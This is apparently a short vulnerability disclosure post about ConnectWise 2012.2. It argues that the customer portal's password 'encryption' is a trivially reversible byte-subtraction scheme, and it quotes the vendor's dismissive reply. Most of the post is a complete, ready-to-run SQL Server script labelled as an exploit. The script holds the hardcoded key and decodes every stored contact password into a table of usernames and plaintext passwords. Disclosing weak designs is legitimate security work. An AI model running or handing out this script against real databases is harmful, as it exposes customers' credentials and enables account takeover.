Connectwise Password Recovery

Connectwise password decryption and recovery

The release notes for the 2012.2 edition of Connectwise claim, as a welcome feature, “The customer portal password … is now encrypted”. Unfortunately, what we see is not encryption. What we see is pointless, reversible exercise in incompetence.

Exploit

The below SQL script will produce a table featuring every user’s login name and password.

{% highlight sql %} BEGIN

DECLARE @KeyValue nchar(15), @OutputValue varchar(20), @Working nchar(10), @WorkingKey nchar(10), @Username nchar(32), @LoopCount integer, @CalcKey integer, @WorkingInt integer, @WorkingKeyInt integer, @InputValue nchar(20)

DECLARE pass_cursor CURSOR FOR SELECT CM_Password, Description FROM dbo.Contact, dbo.Contact_Communication WHERE contact.Contact_RecID = Contact_Communication.Contact_RecID AND Communication_Type_RecID = ‘1’ AND CM_Password is not NULL

OPEN pass_cursor

FETCH NEXT FROM pass_cursor INTO @InputValue, @Username

WHILE @@FETCH_STATUS = 0 BEGIN SET @KeyValue = ‘RASCENCRYPT101R’ SET @LoopCount = 1 SET @OutputValue = ” WHILE len(@InputValue) >= @LoopCount BEGIN SET @Working = ascii(substring(@InputValue, @LoopCount, 1)) SET @WorkingKey = ascii(substring(@KeyValue, @LoopCount, 1)) IF convert(integer, @Working) < convert(integer, @WorkingKey) BEGIN SET @Working = char(convert(integer, (@Working + 255)) - convert(integer, @WorkingKey)) END ELSE BEGIN SET @Working = char(convert(integer, @Working) - convert (integer, @WorkingKey)) END SET @LoopCount = @LoopCount + 1 SET @OutputValue = @OutputValue + convert(char(1), @working) END

SELECT @Username, @outputvalue

FETCH NEXT FROM pass_cursor 
INTO @InputValue, @Username

END

CLOSE pass_cursor; DEALLOCATE pass_cursor;

END

{% endhighlight %}

Vendor Response

The vendor responds “Connectwise is secured through the purchase of an SSL certificate” (WTF?)